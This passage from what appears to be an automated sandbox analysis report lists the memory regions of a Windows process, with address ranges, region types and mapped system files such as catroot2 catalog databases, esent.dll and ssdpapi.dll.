"c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35972 start_va = 0xae0000 end_va = 0xae1fff entry_point = 0x0 region_type = private 
name = "private_0x0000000000ae0000" filename = "" Region: id = 35973 start_va = 0xaf0000 end_va = 0xaf4fff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 35974 start_va = 0xb00000 end_va = 0xdcefff entry_point = 0xb00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 35975 start_va = 0xdd0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 35976 start_va = 0xe10000 end_va = 0xe10fff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 35977 start_va = 0xe20000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 35978 start_va = 0xe30000 end_va = 0xe3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 35979 start_va = 0xe40000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 35980 start_va = 0xec0000 end_va = 0xec0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 35981 start_va = 0xed0000 end_va = 0xedffff entry_point = 0xed0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35982 start_va = 0xee0000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 35983 start_va = 0xf20000 end_va = 0xf2ffff entry_point = 0xf20000 region_type = mapped_file name = "catdb" filename = 
"\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35984 start_va = 0xf30000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 35985 start_va = 0xf70000 end_va = 0xf7ffff entry_point = 0xf70000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35986 start_va = 0xf80000 end_va = 0xf8ffff entry_point = 0xf80000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35987 start_va = 0xf90000 end_va = 0xf9ffff entry_point = 0xf90000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35988 start_va = 0xfa0000 end_va = 0xfaffff entry_point = 0xfa0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35989 start_va = 0xfb0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 35990 start_va = 0xff0000 end_va = 0xffffff entry_point = 0xff0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") 
Region: id = 35991 start_va = 0x1000000 end_va = 0x103ffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 35992 start_va = 0x1040000 end_va = 0x104ffff entry_point = 0x1040000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35993 start_va = 0x1050000 end_va = 0x105ffff entry_point = 0x1050000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35994 start_va = 0x1060000 end_va = 0x106ffff entry_point = 0x1060000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35995 start_va = 0x1070000 end_va = 0x107ffff entry_point = 0x1070000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35996 start_va = 0x1080000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 35997 start_va = 0x1180000 end_va = 0x118ffff entry_point = 0x1180000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35998 start_va = 0x1190000 end_va = 0x119ffff entry_point = 0x1190000 region_type = mapped_file name = "catdb" filename = 
"\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 35999 start_va = 0x11a0000 end_va = 0x11affff entry_point = 0x11a0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36000 start_va = 0x11b0000 end_va = 0x11effff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 36001 start_va = 0x11f0000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 36002 start_va = 0x1200000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 36003 start_va = 0x1210000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 36004 start_va = 0x1220000 end_va = 0x122ffff entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 36005 start_va = 0x1230000 end_va = 0x123ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 36006 start_va = 0x1280000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 36007 start_va = 0x1380000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 36008 start_va = 0x13c0000 end_va = 0x13c0fff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 36009 start_va = 0x13d0000 end_va = 0x13d0fff entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 36010 
start_va = 0x13e0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000013e0000" filename = "" Region: id = 36011 start_va = 0x13f0000 end_va = 0x13fffff entry_point = 0x13f0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 36012 start_va = 0x1400000 end_va = 0x140ffff entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 36013 start_va = 0x1410000 end_va = 0x141ffff entry_point = 0x1410000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36014 start_va = 0x1420000 end_va = 0x145ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 36015 start_va = 0x1460000 end_va = 0x146ffff entry_point = 0x1460000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36016 start_va = 0x1480000 end_va = 0x148ffff entry_point = 0x1480000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36017 start_va = 0x1490000 end_va = 0x149ffff entry_point = 0x1490000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36018 
start_va = 0x14a0000 end_va = 0x14affff entry_point = 0x14a0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36019 start_va = 0x14b0000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 36020 start_va = 0x14c0000 end_va = 0x15bffff entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 36021 start_va = 0x15c0000 end_va = 0x15cffff entry_point = 0x15c0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36022 start_va = 0x15d0000 end_va = 0x15dffff entry_point = 0x15d0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36023 start_va = 0x15e0000 end_va = 0x15effff entry_point = 0x15e0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36024 start_va = 0x1630000 end_va = 0x163ffff entry_point = 0x1630000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36025 start_va = 0x1640000 end_va = 0x164ffff entry_point = 0x1640000 region_type = mapped_file name = "catdb" filename = 
"\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36026 start_va = 0x1650000 end_va = 0x165ffff entry_point = 0x1650000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36027 start_va = 0x1660000 end_va = 0x166ffff entry_point = 0x1660000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36028 start_va = 0x1670000 end_va = 0x167ffff entry_point = 0x1670000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36029 start_va = 0x1680000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 36030 start_va = 0x16c0000 end_va = 0x16cffff entry_point = 0x16c0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36031 start_va = 0x16d0000 end_va = 0x16dffff entry_point = 0x16d0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36032 start_va = 0x16e0000 end_va = 0x16effff entry_point = 0x16e0000 region_type = mapped_file name = "catdb" 
filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36033 start_va = 0x16f0000 end_va = 0x172ffff entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 36034 start_va = 0x1730000 end_va = 0x17effff entry_point = 0x1730000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 36035 start_va = 0x17f0000 end_va = 0x18affff entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 36036 start_va = 0x18f0000 end_va = 0x18fffff entry_point = 0x18f0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36037 start_va = 0x1900000 end_va = 0x19fffff entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 36038 start_va = 0x1a00000 end_va = 0x1a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 36039 start_va = 0x1a40000 end_va = 0x1a4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a40000" filename = "" Region: id = 36040 start_va = 0x1a50000 end_va = 0x1a5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a50000" filename = "" Region: id = 36041 start_va = 0x1a60000 end_va = 0x1a6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a60000" filename = "" Region: id = 36042 start_va = 0x1a70000 end_va = 0x1a7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a70000" filename = "" Region: id = 
36043 start_va = 0x1a80000 end_va = 0x1a8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a80000" filename = "" Region: id = 36044 start_va = 0x1a90000 end_va = 0x1a9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a90000" filename = "" Region: id = 36045 start_va = 0x1aa0000 end_va = 0x1aaffff entry_point = 0x1aa0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36046 start_va = 0x1ab0000 end_va = 0x1abffff entry_point = 0x1ab0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36047 start_va = 0x1ac0000 end_va = 0x1bbffff entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 36048 start_va = 0x1bc0000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 36049 start_va = 0x1cc0000 end_va = 0x1ccffff entry_point = 0x1cc0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36050 start_va = 0x1cd0000 end_va = 0x1cdffff entry_point = 0x1cd0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36051 start_va = 0x1ce0000 end_va = 0x1ceffff entry_point = 0x1ce0000 region_type = mapped_file name = "catdb" filename = 
"\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36052 start_va = 0x1cf0000 end_va = 0x1cfffff entry_point = 0x1cf0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36053 start_va = 0x1d00000 end_va = 0x1d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 36054 start_va = 0x1d10000 end_va = 0x1d1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d10000" filename = "" Region: id = 36055 start_va = 0x1d20000 end_va = 0x1d2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d20000" filename = "" Region: id = 36056 start_va = 0x1d30000 end_va = 0x1d3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d30000" filename = "" Region: id = 36057 start_va = 0x1d40000 end_va = 0x1d4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d40000" filename = "" Region: id = 36058 start_va = 0x1d50000 end_va = 0x1d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d50000" filename = "" Region: id = 36059 start_va = 0x1d60000 end_va = 0x1d6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d60000" filename = "" Region: id = 36060 start_va = 0x1d70000 end_va = 0x2d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 36061 start_va = 0x2d70000 end_va = 0x2d7ffff entry_point = 0x2d70000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: 
"c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36062 start_va = 0x2d80000 end_va = 0x2d8ffff entry_point = 0x2d80000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36063 start_va = 0x2d90000 end_va = 0x2d9ffff entry_point = 0x2d90000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36064 start_va = 0x2da0000 end_va = 0x2daffff entry_point = 0x2da0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36065 start_va = 0x2db0000 end_va = 0x2dbffff entry_point = 0x2db0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36066 start_va = 0x2dc0000 end_va = 0x2dcffff entry_point = 0x2dc0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36067 start_va = 0x2dd0000 end_va = 0x2ddffff entry_point = 0x2dd0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36068 start_va = 0x2de0000 end_va = 0x2deffff 
entry_point = 0x2de0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36069 start_va = 0x2df0000 end_va = 0x2dfffff entry_point = 0x2df0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36070 start_va = 0x2e00000 end_va = 0x2e0ffff entry_point = 0x2e00000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36071 start_va = 0x2e10000 end_va = 0x2e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 36072 start_va = 0x2e50000 end_va = 0x2e5ffff entry_point = 0x2e50000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36073 start_va = 0x2e60000 end_va = 0x2e6ffff entry_point = 0x2e60000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36074 start_va = 0x2e70000 end_va = 0x2e7ffff entry_point = 0x2e70000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36075 start_va = 0x2e80000 end_va = 
0x2e8ffff entry_point = 0x2e80000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36076 start_va = 0x2e90000 end_va = 0x2e9ffff entry_point = 0x2e90000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36077 start_va = 0x2ea0000 end_va = 0x2eaffff entry_point = 0x2ea0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36078 start_va = 0x2eb0000 end_va = 0x2ebffff entry_point = 0x2eb0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36079 start_va = 0x2ec0000 end_va = 0x2ecffff entry_point = 0x2ec0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36080 start_va = 0x2ed0000 end_va = 0x2edffff entry_point = 0x2ed0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36081 start_va = 0x2ee0000 end_va = 0x2eeffff entry_point = 0x2ee0000 region_type = mapped_file name = "catdb" filename = 
"\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36082 start_va = 0x2ef0000 end_va = 0x2efffff entry_point = 0x2ef0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36083 start_va = 0x2f00000 end_va = 0x2f0ffff entry_point = 0x2f00000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36084 start_va = 0x2f10000 end_va = 0x2f1ffff entry_point = 0x2f10000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36085 start_va = 0x2f20000 end_va = 0x2f2ffff entry_point = 0x2f20000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36086 start_va = 0x6ce40000 end_va = 0x6cfe2fff entry_point = 0x6ce40000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 36087 start_va = 0x6fce0000 end_va = 0x6fcecfff entry_point = 0x6fce0000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 36088 start_va = 